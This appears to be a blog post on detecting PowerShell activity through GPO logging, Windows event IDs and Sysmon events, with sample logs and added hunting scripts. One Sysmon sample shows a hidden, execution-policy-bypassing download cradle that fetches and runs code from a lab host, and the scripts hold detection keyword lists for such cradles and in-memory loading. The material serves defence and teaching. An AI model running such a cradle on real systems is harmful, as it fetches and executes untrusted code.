
Investigating Powershell Activity


In this blog post, we will cover how to track PowerShell activity. We start with the logging PowerShell can produce itself, then look at the Windows Security log and finally at Sysmon.

Logging PowerShell Activity

The majority of the PowerShell logging settings live in Group Policy under Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows PowerShell (the same settings can be written directly to HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell).
Here are the options available to us:



Turn on Module Logging produces event ID 4103 in Microsoft-Windows-PowerShell/Operational (and event ID 800 in the classic Windows PowerShell log).

Turn on PowerShell Script Block Logging produces event ID 4104.

Turn on PowerShell Transcription records everything the user types, together with the output returned, for the whole PowerShell session into a text file in the configured output directory.
For example:
**********************
Windows PowerShell transcript start
Start time: 20240522143937
Username: TESTDUMMY\Administrator
RunAs User: TESTDUMMY\Administrator
Configuration Name: 
Machine: DUMMYC1 (Microsoft Windows NT 10.0.19045.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 17368
PSVersion: 5.1.19041.4412
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.4412
BuildVersion: 10.0.19041.4412
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20240522143956
**********************
PS C:\Users\Administrator> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : testdummy.com
   IPv4 Address. . . . . . . . . . . : 192.168.109.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.109.1

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
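The three settings above can be switched on without Group Policy by writing the registry values the GPO itself writes. The following is an added example, not code from the original post; it must run from an elevated prompt, and the transcript directory C:\PSTranscripts is an assumption (choose a location users can write to but not read or delete from, ideally one that is forwarded off the host).

```powershell
# Added example: enable Module Logging, Script Block Logging and Transcription
# by writing the same values the GPO settings write. Run elevated.
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Module Logging -> Event ID 4103 (Microsoft-Windows-PowerShell/Operational)
# and 800 (Windows PowerShell). A ModuleNames value of '*' covers every module.
New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
New-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# Script Block Logging -> Event ID 4104. Invocation logging (4105/4106) is
# deliberately left off: it fires for every script block start/stop and is very noisy.
New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockInvocationLogging -Value 0 -Type DWord

# Transcription -> text files like the transcript shown above.
$transcriptDir = 'C:\PSTranscripts'   # assumption: pick a write-only, forwarded location
New-Item -Path $transcriptDir -ItemType Directory -Force | Out-Null
New-Item -Path "$base\Transcription" -Force | Out-Null
Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value $transcriptDir -Type String

# Verify. The policy is read when an engine starts, so launch a fresh
# powershell.exe, run something, then look for the events and the transcript.
Start-Process powershell.exe -ArgumentList '-NoProfile', '-Command', 'Get-Date' -Wait -WindowStyle Hidden
Start-Sleep -Seconds 2
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4103, 4104; StartTime = (Get-Date).AddMinutes(-5) } |
    Group-Object Id | Select-Object Name, Count
Get-ChildItem -Path $transcriptDir -Recurse -Filter 'PowerShell_transcript.*.txt' |
    Select-Object FullName, LastWriteTime
```

Sessions that were already open when the values were written keep running without the new logging; only engines started afterwards pick it up, which is why the check launches a new process rather than running Get-Date in the current one.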

Windows Event Log

Event ID: 4688 A new process has been created

Tells us when PowerShell was started. This event is only written when Audit Process Creation is enabled in the audit policy, and the command line is only included when "Include command line in process creation events" is turned on as well; otherwise the Process Command Line field is empty and you only get the image path.

From the picture below, we can see that powershell.exe was started on May 23, 2024 at 1:45:35.


Additionally, every external program you run from PowerShell (whoami.exe, ipconfig.exe, net.exe and so on) is started as a separate child process of powershell.exe, so it produces its own 4688 event. Built-in cmdlets run inside the PowerShell process and do not show up here. As you can see from the picture below,


the process ID of powershell.exe (5372) is the creator (parent) process ID of whoami.exe. What does that mean? It means a user ran the whoami command from that PowerShell session. Chaining 4688 events on the creator process ID is how you rebuild what a session did, even without PowerShell's own logging.
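The parent/child relationship above can be pulled out of the Security log in bulk. This is an added example, not code from the original post: it switches on process-creation auditing with the command line (run elevated), then lists every process whose creator was powershell.exe or pwsh.exe in the last 24 hours and groups them by the PowerShell parent PID. The 24-hour window and the field names used are those of the 4688 event on Windows 10/Server 2016 and later.

```powershell
# Added example: audit prerequisites, then hunt 4688 for children of PowerShell.

# 1. Auditing. Without the registry value the "Process Command Line" field is empty.
auditpol /set /subcategory:"Process Creation" /success:enable | Out-Null
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
New-Item -Path $auditKey -Force | Out-Null
Set-ItemProperty -Path $auditKey -Name ProcessCreationIncludeCmdLine_Enabled -Value 1 -Type DWord

# 2. Flatten the EventData block into a hashtable so fields are addressed by
#    name rather than by fragile positional index into $_.Properties.
function ConvertFrom-EventData {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    $data = @{}
    foreach ($node in ([xml]$Event.ToXml()).Event.EventData.Data) {
        $data[$node.Name] = $node.'#text'
    }
    $data
}

$since = (Get-Date).AddHours(-24)   # assumption: tune the window to your retention
$children = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d = ConvertFrom-EventData $_
        if ($d.ParentProcessName -match '\\(powershell|pwsh)\.exe$') {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                ParentPid = [int]$d.ProcessId      # "Creator Process ID", logged as a hex string
                Parent    = $d.ParentProcessName
                ChildPid  = [int]$d.NewProcessId
                Child     = $d.NewProcessName
                CmdLine   = $d.CommandLine         # empty unless step 1 was applied before the event
                User      = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
            }
        }
    }

# 3. One PowerShell session spawning whoami, net, nltest, ipconfig in a row is
#    the discovery pattern worth a closer look; group on the parent PID to see it.
$children | Group-Object ParentPid | ForEach-Object {
    "powershell.exe PID $($_.Name) spawned: " + (($_.Group.Child | Split-Path -Leaf) -join ', ')
}
$children | Format-Table Time, ParentPid, ChildPid, Child, CmdLine -AutoSize -Wrap
```

PIDs are reused after a process exits, so when correlating across a long window pair the creator PID with the parent's own 4688 time (or use Sysmon's ProcessGuid, which is unique) rather than trusting the number alone.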

Event ID: 400 Engine Lifecycle (Windows PowerShell log)

This event is similar to event ID 4688 in that it tells you a PowerShell engine was started, but it is written by PowerShell itself (into the classic Windows PowerShell log) rather than by the Security auditing subsystem, so it is present even where process-creation auditing is off. It is logged whenever an engine goes from None to Available, in any host process, not only powershell.exe; the HostApplication field shows which executable is hosting the engine, which makes it a cheap way to spot PowerShell running inside something other than powershell.exe or powershell_ise.exe.
Details:

Engine state is changed from None to Available. 

Details: 
	NewEngineState=Available
	PreviousEngineState=None

	SequenceNumber=13

	HostName=ConsoleHost
	HostVersion=5.1.19041.4412
	HostId=be286975-3018-400f-b789-f596ce246438
	HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	EngineVersion=5.1.19041.4412
	RunspaceId=a738cd72-eb7d-4c73-80bf-091eea0eaa39
	PipelineId=
	CommandName=
	CommandType=
	ScriptName=
	CommandPath=
	CommandLine=

Event ID: 800 & 4103 Module logging (pipeline execution details)

Records pipeline execution details for the modules logging was enabled for: the cmdlet or function that was invoked and the parameter values it was bound with. Event 4103 is written to Microsoft-Windows-PowerShell/Operational and event 800 to the classic Windows PowerShell log. Enabling logging for the module name * covers every module, including Microsoft.PowerShell.Core, which is what you want for investigations.

Event ID: 4104 Script Block logging

Logs the content of each script block as it is executed. Because the logging happens after PowerShell has parsed the code and just before it runs, an obfuscated or base64-encoded payload is recorded in its decoded form. If a long script is run, it is divided into multiple 4104 events that share the same ScriptBlockId and carry a MessageNumber and MessageTotal, so the pieces can be put back together. Even when the policy is not enabled, PowerShell 5 and later still writes 4104 events at Warning level for script blocks containing terms it considers suspicious.
Example:
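Reassembling a script that was split across several 4104 events, as an added example that is not from the original post. It groups the fragments by ScriptBlockId, orders them by MessageNumber, joins the text, and then triages the results with a small keyword list; the 24-hour window and the keyword list are assumptions meant as a starting point, not a rule set.

```powershell
# Added example: rebuild split 4104 script blocks and triage them.
$since = (Get-Date).AddHours(-24)   # assumption
$fragments = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d = @{}
        foreach ($node in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$node.Name] = $node.'#text' }
        [pscustomobject]@{
            Time          = $_.TimeCreated
            Level         = $_.LevelDisplayName   # 'Warning' = PowerShell's own suspicious-content heuristic fired
            ScriptBlockId = $d.ScriptBlockId
            Number        = [int]$d.MessageNumber
            Total         = [int]$d.MessageTotal
            Path          = $d.Path               # empty for interactive or in-memory code
            Text          = $d.ScriptBlockText
        }
    }

# One object per script block; Complete tells you whether every fragment is present.
$scripts = $fragments | Group-Object ScriptBlockId | ForEach-Object {
    $ordered = @($_.Group | Sort-Object Number)
    [pscustomobject]@{
        ScriptBlockId = $_.Name
        FirstSeen     = $ordered[0].Time
        Fragments     = "$($ordered.Count)/$($ordered[0].Total)"
        Complete      = ($ordered.Count -eq $ordered[0].Total)
        Warning       = ($ordered.Level -contains 'Warning')
        Path          = $ordered[0].Path
        Script        = ($ordered.Text -join '')
    }
}

# Triage: flagged by PowerShell itself, or using the usual download / decode /
# reflective-loading primitives. Expect false positives from legitimate admin scripts.
$iocs = 'DownloadString|DownloadFile|FromBase64String|\bIEX\b|Invoke-Expression|Reflection\.Assembly|VirtualAlloc|AmsiUtils'
$scripts |
    Where-Object { $_.Warning -or $_.Script -match $iocs } |
    Sort-Object FirstSeen |
    Format-List FirstSeen, ScriptBlockId, Fragments, Complete, Path, Script
```

A block with Complete = False usually means the log rolled over between fragments; the Operational log defaults to a small size, so raise it (or forward it) before relying on 4104 for reconstruction.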


Sysmon Events

Event ID: 1 Process Creation

Tracks when a process is created, together with its full command line, hashes, parent process and parent command line, and the user it runs as.

Example:

Process Create:
RuleName: technique_id=T1059.001,technique_name=PowerShell
UtcTime: 2024-05-23 19:03:05.132
ProcessGuid: {e58af071-92e9-664f-4204-000000002500}
ProcessId: 18232
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.19041.3996 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -c "IEX ((New-Object System.Net.Webclient).DownloadString('http://192.168.109.6:9000/svch0st.exe'))"
CurrentDirectory: C:\Users\Administrator\
User: TESTDUMMY\Administrator
LogonGuid: {e58af071-f906-664e-5117-120000000000}
LogonId: 0x121751
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=801262E122DB6A2E758962896F260B55BBD0136A,MD5=2E5A8590CF6848968FC23DE3FA1E25F1,SHA256=9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3,IMPHASH=3D08F4848535206D772DE145804FF4B6
ParentProcessGuid: {e58af071-92d4-664f-4004-000000002500}
ParentProcessId: 16720
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
ParentUser: TESTDUMMY\Administrator

Event ID: 7 Image Loaded

A better source for gaining visibility into PowerShell than process creation, because it records every process that loads System.Management.Automation.dll or System.Management.Automation.ni.dll, which is the PowerShell engine itself. A process that loads these without being powershell.exe or powershell_ise.exe is hosting PowerShell through the .NET API (so-called unmanaged PowerShell) and never produces a powershell.exe 4688 or Sysmon Event 1. Image loads are not logged by Sysmon unless the configuration contains an ImageLoad rule, so add one for these two DLLs.
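Two Sysmon hunts that follow from the Event 1 and Event 7 discussion above, as an added example that is not from the original post. The first scores powershell.exe command lines on the flags seen in the Event 1 example (hidden window, bypassed execution policy, no profile, download cradle, in-memory execution) and decodes an -EncodedCommand payload where one is present; the second lists processes other than the known PowerShell hosts that loaded the engine DLLs. It assumes Sysmon is installed with ProcessCreate enabled and an ImageLoad rule covering the two DLLs, and that 24 hours of events are still in the log.

```powershell
# Added example: Sysmon Event 1 command-line triage and Event 7 unmanaged-host hunt.
function ConvertFrom-EventData {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    $data = @{}
    foreach ($node in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    $data
}

function Get-SysmonEvents([int[]]$Id, [datetime]$Since) {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = $Id; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertFrom-EventData $_
            $d['TimeCreated'] = $_.TimeCreated
            [pscustomobject]$d
        }
}

$since = (Get-Date).AddHours(-24)   # assumption

# --- Event 1: score the command line. Each entry is one indicator; alerting on
#     two or more avoids paging on every admin script that uses -NoProfile.
$suspiciousArgs = @(
    @{ Name = 'hidden window';    Regex = '-w(indowstyle)?\s+h(idden)?\b' },
    @{ Name = 'bypass policy';    Regex = '-e(xecutionpolicy|p)\s+bypass' },
    @{ Name = 'no profile';       Regex = '-nop(rofile)?\b' },
    @{ Name = 'non-interactive';  Regex = '-noni(nteractive)?\b' },
    @{ Name = 'encoded command';  Regex = '-e[a-z]*\s+[A-Za-z0-9+/=]{20,}' },
    @{ Name = 'download cradle';  Regex = 'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient' },
    @{ Name = 'in-memory exec';   Regex = '\bIEX\b|Invoke-Expression' }
)

function Get-EncodedCommand([string]$CommandLine) {
    # -EncodedCommand takes base64 of UTF-16LE text; decode it for the analyst.
    if ($CommandLine -imatch '-e[a-z]*\s+([A-Za-z0-9+/=]{20,})') {
        try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) } catch { $null }
    }
}

Get-SysmonEvents -Id 1 -Since $since |
    Where-Object { $_.Image -match '\\(powershell|pwsh)\.exe$' } |
    ForEach-Object {
        $cmd  = $_.CommandLine
        $hits = @($suspiciousArgs | Where-Object { $cmd -imatch $_.Regex } | ForEach-Object { $_.Name })
        if ($hits.Count -ge 2) {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $_.User
                Parent      = $_.ParentImage
                Indicators  = ($hits -join ', ')
                CommandLine = $cmd
                Decoded     = Get-EncodedCommand $cmd
            }
        }
    } | Format-List

# --- Event 7: anything that loads the engine DLLs is hosting PowerShell,
#     whatever the executable is called.
$knownHosts = '\\(powershell|pwsh|powershell_ise)\.exe$'
Get-SysmonEvents -Id 7 -Since $since |
    Where-Object { $_.ImageLoaded -match '\\System\.Management\.Automation(\.ni)?\.dll$' -and $_.Image -notmatch $knownHosts } |
    Group-Object Image |
    ForEach-Object {
        [pscustomobject]@{
            UnmanagedHost = $_.Name
            Loads         = $_.Count
            FirstSeen     = ($_.Group.TimeCreated | Sort-Object | Select-Object -First 1)
        }
    } | Format-Table -AutoSize
```

The Event 7 hunt will also surface legitimate hosts such as wsmprovhost.exe (PowerShell remoting) and management agents that embed the engine; baseline those per environment rather than adding them to the exclusion list blindly, since a renamed binary dropped in a user-writable directory is exactly what the hunt is meant to catch.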

Event ID: 10 Process accessed

This event is recorded when one process opens a handle to another process (for example via OpenProcess); GrantedAccess is the access mask that was granted, and CallTrace shows the call stack at the time the handle was opened.

Example:

Process accessed:
RuleName: technique_id=T1055.001,technique_name=Dynamic-link Library Injection
UtcTime: 2024-05-23 01:55:15.261
SourceProcessGUID: {e58af071-96c2-664f-6e04-000000002500}
SourceProcessId: 19452
SourceThreadId: 14772
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessGUID: {e58af071-ad33-664f-a704-000000002500}
TargetProcessId: 16164
TargetImage: C:\Windows\system32\whoami.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9e9c4|C:\Windows\System32\KERNELBASE.dll+59655|C:\Windows\System32\KERNELBASE.dll+566d6|C:\Windows\System32\KERNEL32.DLL+1cec4|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+3512b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+2b3c09|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+2b3579|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+12826a9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1198b2a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+12441cd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1243e8b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1319e8f|UNKNOWN(00007FFA3BAC6611)
SourceUser: TESTDUMMY\Administrator
TargetUser: TESTDUMMY\Administrator

Looking above, we see powershell.exe opening a handle to whoami.exe with GrantedAccess 0x1FFFFF (PROCESS_ALL_ACCESS). On its own this is expected rather than evidence of injection: the CallTrace passes through System.ni.dll and KERNEL32.DLL, which is .NET's Process.Start creating the child, and a parent always receives a full-access handle to a process it has just created. The RuleName tag comes from the ProcessAccess rule in the Sysmon configuration, not from Sysmon judging the event malicious. Process access events become interesting when the target is something the source has no business touching, such as lsass.exe, so tune the ProcessAccess rules by target image and access mask instead of alerting on every 0x1FFFFF.